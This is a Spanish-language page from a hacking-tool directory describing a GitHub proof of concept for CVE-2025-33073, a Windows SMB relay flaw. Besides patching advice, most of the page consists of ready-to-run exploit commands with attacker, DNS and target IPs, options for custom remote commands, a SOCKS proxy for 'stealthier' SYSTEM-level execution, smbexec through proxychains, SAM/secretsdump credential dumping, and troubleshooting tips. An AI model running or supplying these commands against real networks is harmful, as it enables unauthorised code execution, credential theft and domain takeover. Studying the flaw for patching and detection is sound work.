Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
Herramientas/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
Análisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

Ver Repositorio
16hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

✨ CVE-2025-33073: Vulnerabilidad de RCE en Windows SMB 🚨

🔥 Ejecución remota de código autenticada de alta gravedad 🔥 Control de acceso inadecuado en el cliente SMB de Windows (CWE-284)


🛡️ Detalles clave de un vistazo

Descargar herramienta
AspectoDetalles
Puntuación CVSS v3.18.8 (Alta) 🔥
Sistemas afectadosWindows 10, 11, Server 2012–2025 (todas las ediciones) 💻
Fecha de divulgación10 de junio de 2025 📅 (Parcheado en el Patch Tuesday de junio de 2025)
ExplotaciónExplotada activamente en entornos reales 😱
Añadida al KEV de CISA el 21 de octubre de 2025
Vector de ataqueRed (Autenticado) 🌐
ImpactoEjecución de código a nivel de SYSTEM 👑
Movimiento lateral mediante relay Kerberos
OmisiónMitigaciones de reflexión NTLM ⚡

🛠️ Mitigaciones inmediatas

  1. ¡Parchea ahora! 🔧
    → Aplica las actualizaciones de Microsoft (p. ej., KB5060998)
    → Guía de actualización de Microsoft 🔗

  2. Habilita la firma SMB ✍️
    → Impónla en todos los clientes y servidores
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. Restringe NTLM 🚫
    → Bloquea NTLM cuando sea posible
    → Supervisa los intentos de relay con herramientas EDR

  4. ¿Solución automatizada? 🤖
    → Usa Vicarius vRx o scripts personalizados para remediación masiva


⚠️ Por qué es importante

  • Omite las protecciones NTLM tradicionales 🛑
  • Funciona incluso con la firma SMB no habilitada
  • Permite la toma de control total del dominio en entornos de AD mal configurados 🏰

Estado al 15 de noviembre de 2025:
✅ Parcheado
❌ Aún explotado en sistemas sin parchear
🔔 Fecha límite de CISA: 10 de noviembre de 2025 ⏰


⚠️ Ejemplo de uso

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

Comando personalizado En lugar de ejecutar secretsdump, se puede ejecutar un comando personalizado.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS Para una ejecución más sigilosa de comandos después de haber establecido una conexión válida como SYSTEM. Aquí --target y --target-ip deben ser iguales.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

También se puede ejecutar un comando personalizado a través de proxychains en lugar de volcar SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

Explotación manual sin requisito de DNS

Si estás en el mismo dominio de difusión que el dispositivo y es vulnerable al envenenamiento LLMNR, es posible explotar un dispositivo sin tener que registrar un registro DNS.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

Solución de problemas:

  • He visto que el ataque a veces no funciona porque se usa el nombre de host para el ataque, lo que produce una búsqueda DNS desde Kali. Si Kali no está usando el servidor DNS u obtienes un mensaje '/ FAILED' de impacket-ntlmrelayx, prueba a añadir el host a tu archivo /etc/hosts. Esto debería hacer que el ataque funcione.

  • Si se usa IP, el ataque debería funcionar. A veces, ejecutarlo varias veces da como resultado un SUCCESS en lugar de un fallo. Hasta ahora no está del todo claro por qué ocurre esto. Creo que tiene algo que ver con la red.

  • Prueba otro método de coacción usando -M o --method.


Wireshark:

Se realiza la autenticación NTLM local

455252866-0a3fe643-2d52-427a-91f2-991770732f62

No se realiza la autenticación NTLM local, lo que da como resultado un intento FAILED

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

Bueno saber:

  • xterm permite copiar y pegar con el botón central del ratón.
  • El registro DNS también debe ser conocido por el cliente; esto puede llevar más tiempo en algunas ocasiones. Con más tiempo me refiero a darle un par de minutos.
  • Esto es solo un PoC, lo que significa que no se ha intentado evadir AV/EDR. Úsalo bajo tu propio riesgo.

¡No esperes: parchea hoy! 🛑
La seguridad de tu red depende de ello. 💪